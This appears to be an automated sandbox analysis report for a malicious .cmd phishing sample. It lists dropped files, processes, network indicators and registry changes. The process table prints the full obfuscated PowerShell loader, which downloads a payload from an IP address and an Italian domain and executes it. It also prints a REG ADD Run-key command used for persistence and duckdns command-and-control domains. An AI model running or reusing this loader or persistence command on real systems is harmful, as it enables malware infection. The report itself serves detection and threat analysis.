Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
|
ASCII text, with very long lines (5881), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\mvourhjs.dat
|
data
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xa4c44316, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jds3a5p.p3n.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5x5u0sid.ubx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2y50u2q.jnp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jup5mnvd.q55.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSZK7E8O5BW8JL21KDF5.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Pleurothotonus.Dil
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4;
$Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function
Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u.
Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela
HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F
rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU
Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2
Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab
';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm
(Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir
AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge
e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn
es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra
aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf
C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT
pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral
,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr
bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad
');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r
ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb
Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh
Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe
ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa
. JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug
$ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm
(Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,-
UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg
$VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb
') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm
(Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r
fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci
eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s
NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa
') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd
retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea
Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe
P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr
IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr
');Xerotherm (Handig ' Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv
Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin:
Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke
RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN
bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H
us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function
Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet;
$Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function
Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u.
Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela
HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F
rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU
Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2
Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab
';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm
(Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir
AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge
e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn
es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra
aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf
C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT
pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral
,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr
bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad
');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r
ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb
Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh
Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe
ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa
. JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug
$ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm
(Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,-
UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg
$VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb
') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm
(Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r
fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci
eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s
NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa
') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd
retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea
Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe
P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr
IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr
');Xerotherm (Handig ' Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv
Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin:
Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke
RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN
bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H
us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ
/d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty
-Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpg
|
unknown
|
||
|
http://87.121.105.163/Terminaljob.tocXRul
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.duelvalenza.it/
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://duelvalenza.it/wnnSAFMWPwDXGy95.binKJ
|
unknown
|
||
|
http://geoplugin.net/json.gp0
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://geoplugin.net/k
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gp4
|
unknown
|
||
|
https://duelvalenza.it/wnnSAFMWPwDXGy95.bin
|
46.254.34.12
|
||
|
http://87.121.105.163
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/
|
46.254.34.12
|
||
|
http://geoplugin.net/json.gp7
|
unknown
|
||
|
http://www.duelvalenza.it/eU
|
unknown
|
||
|
http://www.duelvalenza.it/nkF
|
unknown
|
||
|
http://crl.microW
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://duelvalenza.it/
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://87.121.105.163/wnnSAFMWPwDXGy95.bin
|
87.121.105.163
|
||
|
http://geoplugin.net/json.gpH=
|
unknown
|
||
|
http://87.121.105.163/Terminaljob.tocP
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin3
|
unknown
|
||
|
https://duelvalenza.it/wnnSAFMWPwDXGy95.binhttp://87.121.105.163/wnnSAFMWPwDXGy95.bin
|
unknown
|
||
|
http://87.121.105.163/Terminaljob.toc
|
87.121.105.163
|
||
|
http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binM
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin
|
46.254.34.12
|
||
|
http://geoplugin.net/json.gp938=
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binI
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
192.169.69.26
|
|
|
|
jgbours284hawara02.duckdns.org
|
45.88.90.110
|
|
|
|
www.duelvalenza.it
|
unknown
|
|
|
|
google.com
|
142.251.41.78
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
www.google.com
|
142.250.80.68
|
||
|
duelvalenza.it
|
46.254.34.12
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.88.90.110
|
jgbours284hawara02.duckdns.org
|
Bulgaria
|
|
|
|
192.169.69.26
|
jgbours284hawara01.duckdns.org
|
United States
|
|
|
|
142.250.80.68
|
www.google.com
|
United States
|
||
|
192.168.2.4
|
unknown
|
unknown
|
||
|
46.254.34.12
|
duelvalenza.it
|
Italy
|
||
|
192.168.2.22
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_CURRENT_USER\Bundfloraernes
|
Equalized
|
||
|
HKEY_CURRENT_USER\Environment
|
Frihjulets
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Stagenes
|
There are 11 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5996000
|
heap
|
page read and write
|
|
|
|
210BCD05000
|
trusted library allocation
|
page read and write
|
|
|
|
8E60000
|
direct allocation
|
page execute and read and write
|
|
|
|
6292000
|
trusted library allocation
|
page read and write
|
|
|
|
9685000
|
direct allocation
|
page execute and read and write
|
|
|
|
2087C91B000
|
heap
|
page read and write
|
||
|
5930000
|
heap
|
page read and write
|
||
|
34BF000
|
unkown
|
page read and write
|
||
|
210AD1CB000
|
trusted library allocation
|
page read and write
|
||
|
1A44F810000
|
heap
|
page read and write
|
||
|
2087C914000
|
heap
|
page read and write
|
||
|
3440000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
210AAB90000
|
heap
|
page read and write
|
||
|
20877513000
|
heap
|
page read and write
|
||
|
2087C906000
|
heap
|
page read and write
|
||
